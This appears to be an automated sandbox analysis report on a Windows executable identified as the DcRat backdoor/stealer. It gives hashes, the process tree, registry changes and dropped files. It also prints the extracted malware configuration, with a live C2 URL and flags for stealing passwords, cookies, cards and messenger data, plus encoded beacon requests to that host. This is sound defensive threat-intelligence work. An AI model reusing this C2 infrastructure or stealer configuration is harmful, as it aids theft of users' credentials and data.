| File name: | 6568B821F5238D72D6AD4BEA0CC8E78B.exe |
| Full analysis: | https://app.any.run/tasks/1379f2c3-0b00-47ba-b646-a6cbc6466559 |
| Verdict: | Malicious activity |
| Threats: | A backdoor is a type of cybersecurity threat that allows attackers to secretly compromise a system and conduct malicious activities, such as stealing data and modifying files. Backdoors can be difficult to detect, as they often use legitimate system applications to evade defense mechanisms. Threat actors often utilize special malware, such as PlugX, to establish backdoors on target devices. |
| Analysis date: | September 26, 2023, 13:17:38 |
| OS: | Windows 7 Professional Service Pack 1 (build: 7601, 64 bit) |
| Tags: | |
| Indicators: | |
| MIME: | application/x-dosexec |
| File info: | PE32 executable (console) Intel 80386, for MS Windows |
| MD5: | 6568B821F5238D72D6AD4BEA0CC8E78B |
| SHA1: | 0194E4D37D26DCF4A9D1A40030C0F4DA3DFD11AF |
| SHA256: | FD9398B7FCF235842AC5C82405E5B05077456C0011AA4E9B19B0E8BE6B172F91 |
| SSDEEP: | 24576:1RuqB2C+v6LHivwR5aTFG8ctmbqDA990ntXXxiDiWC7G:zuqBJ3/yiWYG |
| .exe | | | Win32 Executable MS Visual C++ (generic) (42.2) |
|---|---|---|
| .exe | | | Win64 Executable (generic) (37.3) |
| .dll | | | Win32 Dynamic Link Library (generic) (8.8) |
| .exe | | | Win32 Executable (generic) (6) |
| .exe | | | Generic Win/DOS Executable (2.7) |
| Subsystem: | Windows command line |
|---|---|
| SubsystemVersion: | 6 |
| ImageVersion: | - |
| OSVersion: | 6 |
| EntryPoint: | 0x99a4 |
| UninitializedDataSize: | - |
| InitializedDataSize: | 848384 |
| CodeSize: | 154624 |
| LinkerVersion: | 14.34 |
| PEType: | PE32 |
| ImageFileCharacteristics: | Executable, 32-bit |
| TimeStamp: | 2023:09:15 18:54:18+00:00 |
| MachineType: | Intel 386 or later, and compatibles |
PID | CMD | Path | Indicators | Parent process | |||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
| 2148 | w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2 | C:\Windows\System32\w32tm.exe | — | w32tm.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Time Service Diagnostic Tool Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) Modules
| |||||||||||||||
| 2528 | "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe" | C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe | 6568B821F5238D72D6AD4BEA0CC8E78B.exe | ||||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft .NET ClickOnce Launch Utility Exit code: 0 Version: 4.7.2558.0 built by: NET471REL1 Modules
DcRat(PID) Process(2528) AppLaunch.exe C2 (1)http://232161cm.nyashtyan.top/@0J3bwBXdzh2chlnb Options TagЛёха MutexDCR_MUTEX-0SFp0btymkLw3APUPUce savebrowsersdatatosinglefilefalse ignorepartiallyemptydatafalse cookiestrue passwordstrue formstrue cctrue historyfalse telegramtrue steamtrue discordtrue filezillatrue screenshottrue clipboardtrue sysinfotrue searchpath%UsersFolder% - Fast Targetru | |||||||||||||||
| 2840 | w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2 | C:\Windows\SysWOW64\w32tm.exe | — | cmd.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Time Service Diagnostic Tool Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) Modules
| |||||||||||||||
| 3016 | "C:\Users\admin\AppData\Local\Temp\6568B821F5238D72D6AD4BEA0CC8E78B.exe" | C:\Users\admin\AppData\Local\Temp\6568B821F5238D72D6AD4BEA0CC8E78B.exe | explorer.exe | ||||||||||||
User: admin Integrity Level: MEDIUM Exit code: 0 Modules
| |||||||||||||||
| 3312 | C:\Windows\system32\cmd.exe /c ""C:\Users\admin\AppData\Local\Temp\xcTtvCCEHS.bat" " | C:\Windows\SysWOW64\cmd.exe | — | AppLaunch.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 1 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) Modules
| |||||||||||||||
| (PID) Process: | (2528) AppLaunch.exe | Key: | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap |
| Operation: | write | Name: | ProxyBypass |
Value: 1 | |||
| (PID) Process: | (2528) AppLaunch.exe | Key: | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap |
| Operation: | write | Name: | IntranetName |
Value: 1 | |||
| (PID) Process: | (2528) AppLaunch.exe | Key: | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap |
| Operation: | write | Name: | UNCAsIntranet |
Value: 1 | |||
| (PID) Process: | (2528) AppLaunch.exe | Key: | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap |
| Operation: | write | Name: | AutoDetect |
Value: 0 | |||
PID | Process | Filename | Type | |
|---|---|---|---|---|
| 2528 | AppLaunch.exe | C:\Users\admin\AppData\Local\Temp\7IsMUKCWrz | sqlite | |
MD5:C9FF7748D8FCEF4CF84A5501E996A641 | SHA256:4D3F3194CB1133437AA69BB880C8CBB55DDF06FF61A88CA6C3F1BBFBFD35D988 | |||
| 2528 | AppLaunch.exe | C:\Users\admin\AppData\Local\Temp\tyk4mzX7rh | binary | |
MD5:1AA08FF2105515DE3602F503E87DFF1A | SHA256:D7446E2F307027C9BDA2A92D1DF1C13C376581372F6AE8708F4D5BACCB2E6813 | |||
| 2528 | AppLaunch.exe | C:\Users\admin\AppData\Local\Temp\0MwEg3U0LQ | binary | |
MD5:C9FF7748D8FCEF4CF84A5501E996A641 | SHA256:4D3F3194CB1133437AA69BB880C8CBB55DDF06FF61A88CA6C3F1BBFBFD35D988 | |||
| 2528 | AppLaunch.exe | C:\Users\admin\AppData\Local\Temp\tpoBlvKnjA | text | |
MD5:F7F3F240408F04D0033FE5D269334FE4 | SHA256:E8983A8E1CBE2D82E6165668A9663ED7871793B594DA368F07BF5E80C2070F8B | |||
| 2528 | AppLaunch.exe | C:\Users\admin\AppData\Local\Temp\ZKg81RrBnw | binary | |
MD5:AE4F400E858ADD6ECF3D2CBBF0E55F9B | SHA256:73C170558B62DD23D381F4AA9BD7B4D7C9613671C5D08D286CFBEB02E6BE300A | |||
| 2528 | AppLaunch.exe | C:\Users\admin\AppData\Local\Temp\MIJM4QIAGf | binary | |
MD5:CEEDD8AE976601F9C9365EBEC5CFD997 | SHA256:0B1A7E634F5B8A88211685983E83E7739359ACE5F26CA99746F46BB81507A42E | |||
| 2528 | AppLaunch.exe | C:\Users\admin\AppData\Local\Temp\Bsrndcvija | binary | |
MD5:A37C32F6C48659B21D268A25398F1A5A | SHA256:D4EEA4FD10B2D27CC0BCF17DD0B4A905E73C26721C51D03A809A33A1AF2CE3B2 | |||
| 2528 | AppLaunch.exe | C:\Users\admin\AppData\Local\Temp\zFpDCSEPm0 | binary | |
MD5:CEB39527E05115BBE0227EA14D897374 | SHA256:D3406398F5A7D00D94E1F36065ACC5C63DBF27FB4026D75FB09129DDD05C2D20 | |||
| 2528 | AppLaunch.exe | C:\Users\admin\AppData\Local\Temp\BCTEmhs40E | binary | |
MD5:0A149D1DB8612AE149B4B3A03204D29F | SHA256:6984F4A4A4CBB11E3B6057314EC765D5210521478FF411F883FC5EC2F31D6768 | |||
| 2528 | AppLaunch.exe | C:\Users\Public\nltxvmn2.default\key4.db | binary | |
MD5:2D88BB69E75C2D609BA79F7353DAECC1 | SHA256:263ECB9445A828CEC98F7C19B2FF3B4DFAD99EE58C5E394E5F6778FD441415F3 | |||
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
|---|---|---|---|---|---|---|---|---|---|
2528 | AppLaunch.exe | GET | 200 | 91.103.252.23:80 | http://232161cm.nyashtyan.top/nyashsupport.php?XbCBSR8yH2mzUNXYzm6RL6AS9OcNZh=POGTQits&9tVsuCZCGlp4pbuabuCDyuYjoXkO3H=G39SckRh7yaHy2TkwV3zxqpIOUv&ab5fe381e05cacaa8baa42b5bd758fb2=wMyQTO4gDM4ETNxETZ5YmYyIzN5EjMxUjZkBTM1UzMwYGZkdjYjVjNwAzM5EDO5IjMxIjNwczM&d5482f6c998a081ff9fb48bcf2314cee=QMjNmMmRmZygTZhhDO4EmYwYmMkVTZxMzNyMjNwkTNmFTOwIDZiJGZ&9d6e5ec8163599a3d65acf9be9ad08a4=0VfiIiOiU2Y1gjNyYzMkFWZjFGO1EWO2EWOxYDMlRWOkNmM2YmYiwiIkNmZ5IjZjNDZ0QmN5QzYkNjYzQ2MjJmZmlzNzETNwkjYlBjMkFWYyIiOiQ2M2UjMzIDMkJTMwATNlJWM3M2MidzM1kjY5gTZ2gDMiwiIkRmYzUmM0cjY1QzYzQmZxETO1YmY0UDZycDOxQjMwEjNlhDNyYzY1IiOiMDNhJjMyQDMhJTN2EDOzkDZ5gTO1Y2YjVjYzMWYyYTZis3W | unknown | — | — | unknown |
2528 | AppLaunch.exe | GET | 200 | 91.103.252.23:80 | http://232161cm.nyashtyan.top/nyashsupport.php?XbCBSR8yH2mzUNXYzm6RL6AS9OcNZh=POGTQits&9tVsuCZCGlp4pbuabuCDyuYjoXkO3H=G39SckRh7yaHy2TkwV3zxqpIOUv&ab5fe381e05cacaa8baa42b5bd758fb2=wMyQTO4gDM4ETNxETZ5YmYyIzN5EjMxUjZkBTM1UzMwYGZkdjYjVjNwAzM5EDO5IjMxIjNwczM&d5482f6c998a081ff9fb48bcf2314cee=QMjNmMmRmZygTZhhDO4EmYwYmMkVTZxMzNyMjNwkTNmFTOwIDZiJGZ&f880b0002f0d31bf8f02966baf29f836=d1nIjJDNkhDZ2EGNlRmZykjM4UWOmVTOjRGNhJTOlRzY4UWZ2MTZmVGN5IiOiQ2M2UjMzIDMkJTMwATNlJWM3M2MidzM1kjY5gTZ2gDMiwiIkRmYzUmM0cjY1QzYzQmZxETO1YmY0UDZycDOxQjMwEjNlhDNyYzY1IiOiMDNhJjMyQDMhJTN2EDOzkDZ5gTO1Y2YjVjYzMWYyYTZis3W | unknown | text | 104 b | unknown |
2528 | AppLaunch.exe | GET | 200 | 91.103.252.23:80 | http://232161cm.nyashtyan.top/nyashsupport.php?XbCBSR8yH2mzUNXYzm6RL6AS9OcNZh=POGTQits&9tVsuCZCGlp4pbuabuCDyuYjoXkO3H=G39SckRh7yaHy2TkwV3zxqpIOUv&ab5fe381e05cacaa8baa42b5bd758fb2=wMyQTO4gDM4ETNxETZ5YmYyIzN5EjMxUjZkBTM1UzMwYGZkdjYjVjNwAzM5EDO5IjMxIjNwczM&d5482f6c998a081ff9fb48bcf2314cee=QMjNmMmRmZygTZhhDO4EmYwYmMkVTZxMzNyMjNwkTNmFTOwIDZiJGZ&f880b0002f0d31bf8f02966baf29f836=d1nIwUmM0UWN1gTNyUDMwMTYiJzNmRTZhRzY1YGMkBzYwQDNiRjZ0U2M3IiOiQ2M2UjMzIDMkJTMwATNlJWM3M2MidzM1kjY5gTZ2gDMiwiIkRmYzUmM0cjY1QzYzQmZxETO1YmY0UDZycDOxQjMwEjNlhDNyYzY1IiOiMDNhJjMyQDMhJTN2EDOzkDZ5gTO1Y2YjVjYzMWYyYTZis3W&9d6e5ec8163599a3d65acf9be9ad08a4=0VfiIiOiU2Y1gjNyYzMkFWZjFGO1EWO2EWOxYDMlRWOkNmM2YmYiwiIwUmM0UWN1gTNyUDMwMTYiJzNmRTZhRzY1YGMkBzYwQDNiRjZ0U2M3IiOiQ2M2UjMzIDMkJTMwATNlJWM3M2MidzM1kjY5gTZ2gDMiwiIkRmYzUmM0cjY1QzYzQmZxETO1YmY0UDZycDOxQjMwEjNlhDNyYzY1IiOiMDNhJjMyQDMhJTN2EDOzkDZ5gTO1Y2YjVjYzMWYyYTZisHL9JSOWp2TpFFWkZnVXJGcSZ0YsZ1RiRlSDxUaV1GZwJ1MZJkSp9UaNhFZwY0RkRFbIRGcahVYw40VRl2dplUavpWSzkzRaVHbyYVVOVVUpdXaJ9kSp9UawcVWqp0VahlTYFWa3lWSapUaPlWVtJmdod0Y2p0MZBXMwMGcKNETptWeNd2YtJGcCh0YsJ1MVdWUU10Z3dlWrlzVUdWWElUN4dVY0ZUbSdWUq5URxUVUvFUallEZF10M0kWTnFURJZlQxE1ZBRUTwkFVMFzaHlEcwUkVvVVbjZnTFlEcJZ0SzZ1RkVHbrlkNJNlW0ZUbUZlQxEVa3lWSwVEMM9EaDlUeWdEZ3Z0RaJkQ5NmasdUY3ZUbjhkQTFFSaZUSrpEWZtWNXlFMOxWS2k0UaRnRtRlVCFjUpdXaJ9kSp9Ua0cVY0J1VRpHbtl0cJN0cRhVWwI1R50WUMl2TpNWVRVlSDxUaRhVYDJ0QOJTQDJGa1IjYw50MjxmWyIWeCZUSzEUejNTOHpVdsJjVp9maJlnVtZVdsJjVpd3UmlGNXF2cKhlWDlzUadXOtNWMWtWS2k0UaVXOtVGbxcVYwo0QMlWQE10dBRUT3lUaPl2dXlFMONjY3p0QMl2auJGax02YsRWRJRXQDpFbs1mWw50VadnTIlEM50GVp9maJ5mSzIWa3lWS6dmeOdHNT1Ee3lnT5VFROV3aE5UavpWSqlzRil2dplkRStWS2k0UllnUuJWM5ITWpdXaJhGbtNGaahVWDpUaPlGNyIGckdlW5p0QMl2YtNGbKdlYspEWk9kSp9UarhEZw5UbJNXST5Ue0kmT6RzQNpHNp1EeJpWS2k0QjBnS5VmNJlnYtVzVTdHbrl0cJlmYwFzRahmSp9UaVdlYoVzajxmTYZVa3lWSEJkVMNlVwUlVKl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiU2Y1gjNyYzMkFWZjFGO1EWO2EWOxYDMlRWOkNmM2YmYiwiI4YjM4UWMiZzNkBzMmZzM2EWY2MDN4ITNjV2N4QDM5gDNlNDOxQzYzIiOiQ2M2UjMzIDMkJTMwATNlJWM3M2MidzM1kjY5gTZ2gDMiwiIkRmYzUmM0cjY1QzYzQmZxETO1YmY0UDZycDOxQjMwEjNlhDNyYzY1IiOiMDNhJjMyQDMhJTN2EDOzkDZ5gTO1Y2YjVjYzMWYyYTZis3W | unknown | text | 104 b | unknown |
2528 | AppLaunch.exe | GET | 200 | 91.103.252.23:80 | http://232161cm.nyashtyan.top/nyashsupport.php?XbCBSR8yH2mzUNXYzm6RL6AS9OcNZh=POGTQits&9tVsuCZCGlp4pbuabuCDyuYjoXkO3H=G39SckRh7yaHy2TkwV3zxqpIOUv&ab5fe381e05cacaa8baa42b5bd758fb2=wMyQTO4gDM4ETNxETZ5YmYyIzN5EjMxUjZkBTM1UzMwYGZkdjYjVjNwAzM5EDO5IjMxIjNwczM&d5482f6c998a081ff9fb48bcf2314cee=QMjNmMmRmZygTZhhDO4EmYwYmMkVTZxMzNyMjNwkTNmFTOwIDZiJGZ&f880b0002f0d31bf8f02966baf29f836=d1nIwUmM0UWN1gTNyUDMwMTYiJzNmRTZhRzY1YGMkBzYwQDNiRjZ0U2M3IiOiQ2M2UjMzIDMkJTMwATNlJWM3M2MidzM1kjY5gTZ2gDMiwiIkRmYzUmM0cjY1QzYzQmZxETO1YmY0UDZycDOxQjMwEjNlhDNyYzY1IiOiMDNhJjMyQDMhJTN2EDOzkDZ5gTO1Y2YjVjYzMWYyYTZis3W&9d6e5ec8163599a3d65acf9be9ad08a4=d1nIiojIlNWN4YjM2MDZhV2YhhTNhljNhlTM2ATZklDZjJjNmJmIsICMlJDNlVTN4UjM1ADMzEmYycjZ0UWY0MWNmBDZwMGM0QjY0YGNlNzNiojIkNjN1IzMyADZyEDMwUTZiFzNjNjY3MTN5IWO4UmN4AjIsICZkJ2MlJDN3IWN0M2MkZWMxkTNmJGN1QmM3gTM0IDMxYTZ4QjM2MWNiojIzQTYyIjM0ATYyUjNxgzM5QWO4kTNmN2Y1I2MjFmM2UmI7xSfiADWmlGOqlkNJNUT0E1VOtmUH1EeBpWTxcGVPxmTXl1akpmW3V1RPxmRX1EaOpnT6lFRP1mWE5UNFRkWzEEVNl2cu9UaFdEZoJVRkRjVtl0cVp2TpFFWkZnVXJGcSZ0YsZ1RiRlSDxUaV1GZwJ1MZJkSp9UaNhFZwY0RkRFbIRGcahVYw40VRl2dplUavpWSzkzRaVHbyYVVOVVUpdXaJ9kSp9UawcVWqp0VahlTYFWa3lWSapUaPlWVtJmdod0Y2p0MZBXMwMGcKNETptWeNd2YtJGcCh0YsJ1MVdWUU10Z3dlWrlzVUdWWElUN4dVY0ZUbSdWUq5URxUVUvFUallEZF10M0kWTnFURJZlQxE1ZBRUTwkFVMFzaHlEcwUkVvVVbjZnTFlEcJZ0SzZ1RkVHbrlkNJNlW0ZUbUZlQxEVa3lWSwVEMM9EaDlUeWdEZ3Z0RaJkQ5NmasdUY3ZUbjhkQTFFSaZUSrpEWZtWNXlFMOxWS2k0UaRnRtRlVCFjUpdXaJ9kSp9Ua0cVY0J1VRpHbtl0cJN0cRhVWwI1R50WUMl2TpNWVRVlSDxUaRhVYDJ0QOJTQDJGa1IjYw50MjxmWyIWeCZUSzEUejNTOHpVdsJjVp9maJlnVtZVdsJjVpd3UmlGNXF2cKhlWDlzUadXOtNWMWtWS2k0UaVXOtVGbxcVYwo0QMlWQE10dBRUT3lUaPl2dXlFMONjY3p0QMl2auJGax02YsRWRJRXQDpFbs1mWw50VadnTIlEM50GVp9maJ5mSzIWa3lWS6dmeOdHNT1Ee3lnT5VFROV3aE5UavpWSqlzRil2dplkRStWS2k0UllnUuJWM5ITWpdXaJhGbtNGaahVWDpUaPlGNyIGckdlW5p0QMl2YtNGbKdlYspEWk9kSp9UarhEZw5UbJNXST5Ue0kmT6RzQNpHNp1EeJpWS2k0QjBnS5VmNJlnYtVzVTdHbrl0cJlmYwFzRahmSp9UaVdlYoVzajxmTYZVa3lWSEJkVMNlVwUlVKl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiU2Y1gjNyYzMkFWZjFGO1EWO2EWOxYDMlRWOkNmM2YmYiwiI4YjM4UWMiZzNkBzMmZzM2EWY2MDN4ITNjV2N4QDM5gDNlNDOxQzYzIiOiQ2M2UjMzIDMkJTMwATNlJWM3M2MidzM1kjY5gTZ2gDMiwiIkRmYzUmM0cjY1QzYzQmZxETO1YmY0UDZycDOxQjMwEjNlhDNyYzY1IiOiMDNhJjMyQDMhJTN2EDOzkDZ5gTO1Y2YjVjYzMWYyYTZis3W | unknown | text | 104 b | unknown |
2528 | AppLaunch.exe | GET | 200 | 91.103.252.23:80 | http://232161cm.nyashtyan.top/nyashsupport.php?XbCBSR8yH2mzUNXYzm6RL6AS9OcNZh=POGTQits&9tVsuCZCGlp4pbuabuCDyuYjoXkO3H=G39SckRh7yaHy2TkwV3zxqpIOUv&ab5fe381e05cacaa8baa42b5bd758fb2=wMyQTO4gDM4ETNxETZ5YmYyIzN5EjMxUjZkBTM1UzMwYGZkdjYjVjNwAzM5EDO5IjMxIjNwczM&d5482f6c998a081ff9fb48bcf2314cee=QMjNmMmRmZygTZhhDO4EmYwYmMkVTZxMzNyMjNwkTNmFTOwIDZiJGZ&090c97bad78efc0fcdf01bcacd4efd48=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 | unknown | text | 104 b | unknown |
2528 | AppLaunch.exe | GET | 200 | 91.103.252.23:80 | http://232161cm.nyashtyan.top/nyashsupport.php?bLJ8vjAqIS0JN=OYnk&e71f21b0805ee5c005f6f2b09ec77740=770962078e1bcbd114dfa096ab91b8a8&d5482f6c998a081ff9fb48bcf2314cee=QN2kTZ3YzY4UWY4kzNyETMmRDNldTZ0UjNzMGZzkTZ1YTZxMmYiVDM&bLJ8vjAqIS0JN=OYnk | unknown | text | 2.07 Kb | unknown |
2528 | AppLaunch.exe | GET | 200 | 91.103.252.23:80 | http://232161cm.nyashtyan.top/nyashsupport.php?XbCBSR8yH2mzUNXYzm6RL6AS9OcNZh=POGTQits&9tVsuCZCGlp4pbuabuCDyuYjoXkO3H=G39SckRh7yaHy2TkwV3zxqpIOUv&ab5fe381e05cacaa8baa42b5bd758fb2=wMyQTO4gDM4ETNxETZ5YmYyIzN5EjMxUjZkBTM1UzMwYGZkdjYjVjNwAzM5EDO5IjMxIjNwczM&d5482f6c998a081ff9fb48bcf2314cee=QMjNmMmRmZygTZhhDO4EmYwYmMkVTZxMzNyMjNwkTNmFTOwIDZiJGZ&f880b0002f0d31bf8f02966baf29f836=d1nIwUmM0UWN1gTNyUDMwMTYiJzNmRTZhRzY1YGMkBzYwQDNiRjZ0U2M3IiOiQ2M2UjMzIDMkJTMwATNlJWM3M2MidzM1kjY5gTZ2gDMiwiIkRmYzUmM0cjY1QzYzQmZxETO1YmY0UDZycDOxQjMwEjNlhDNyYzY1IiOiMDNhJjMyQDMhJTN2EDOzkDZ5gTO1Y2YjVjYzMWYyYTZis3W&9d6e5ec8163599a3d65acf9be9ad08a4=d1nIiojIlNWN4YjM2MDZhV2YhhTNhljNhlTM2ATZklDZjJjNmJmIsICMlJDNlVTN4UjM1ADMzEmYycjZ0UWY0MWNmBDZwMGM0QjY0YGNlNzNiojIkNjN1IzMyADZyEDMwUTZiFzNjNjY3MTN5IWO4UmN4AjIsICZkJ2MlJDN3IWN0M2MkZWMxkTNmJGN1QmM3gTM0IDMxYTZ4QjM2MWNiojIzQTYyIjM0ATYyUjNxgzM5QWO4kTNmN2Y1I2MjFmM2UmI7xSfiADWmlGOqlkNJNUT0E1VOtmUH1EeBpWTxcGVPxmTXl1akpmW3V1RPxmRX1EaOpnT6lFRP1mWE5UNFRkWzEEVNl2cu9UaFdEZoJVRkRjVtl0cVp2TpFFWkZnVXJGcSZ0YsZ1RiRlSDxUaV1GZwJ1MZJkSp9UaNhFZwY0RkRFbIRGcahVYw40VRl2dplUavpWSzkzRaVHbyYVVOVVUpdXaJ9kSp9UawcVWqp0VahlTYFWa3lWSapUaPlWVtJmdod0Y2p0MZBXMwMGcKNETptWeNd2YtJGcCh0YsJ1MVdWUU10Z3dlWrlzVUdWWElUN4dVY0ZUbSdWUq5URxUVUvFUallEZF10M0kWTnFURJZlQxE1ZBRUTwkFVMFzaHlEcwUkVvVVbjZnTFlEcJZ0SzZ1RkVHbrlkNJNlW0ZUbUZlQxEVa3lWSwVEMM9EaDlUeWdEZ3Z0RaJkQ5NmasdUY3ZUbjhkQTFFSaZUSrpEWZtWNXlFMOxWS2k0UaRnRtRlVCFjUpdXaJ9kSp9Ua0cVY0J1VRpHbtl0cJN0cRhVWwI1R50WUMl2TpNWVRVlSDxUaRhVYDJ0QOJTQDJGa1IjYw50MjxmWyIWeCZUSzEUejNTOHpVdsJjVp9maJlnVtZVdsJjVpd3UmlGNXF2cKhlWDlzUadXOtNWMWtWS2k0UaVXOtVGbxcVYwo0QMlWQE10dBRUT3lUaPl2dXlFMONjY3p0QMl2auJGax02YsRWRJRXQDpFbs1mWw50VadnTIlEM50GVp9maJ5mSzIWa3lWS6dmeOdHNT1Ee3lnT5VFROV3aE5UavpWSqlzRil2dplkRStWS2k0UllnUuJWM5ITWpdXaJhGbtNGaahVWDpUaPlGNyIGckdlW5p0QMl2YtNGbKdlYspEWk9kSp9UarhEZw5UbJNXST5Ue0kmT6RzQNpHNp1EeJpWS2k0QjBnS5VmNJlnYtVzVTdHbrl0cJlmYwFzRahmSp9UaVdlYoVzajxmTYZVa3lWSEJkVMNlVwUlVKl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiU2Y1gjNyYzMkFWZjFGO1EWO2EWOxYDMlRWOkNmM2YmYiwiI4YjM4UWMiZzNkBzMmZzM2EWY2MDN4ITNjV2N4QDM5gDNlNDOxQzYzIiOiQ2M2UjMzIDMkJTMwATNlJWM3M2MidzM1kjY5gTZ2gDMiwiIkRmYzUmM0cjY1QzYzQmZxETO1YmY0UDZycDOxQjMwEjNlhDNyYzY1IiOiMDNhJjMyQDMhJTN2EDOzkDZ5gTO1Y2YjVjYzMWYyYTZis3W | unknown | text | 104 b | unknown |
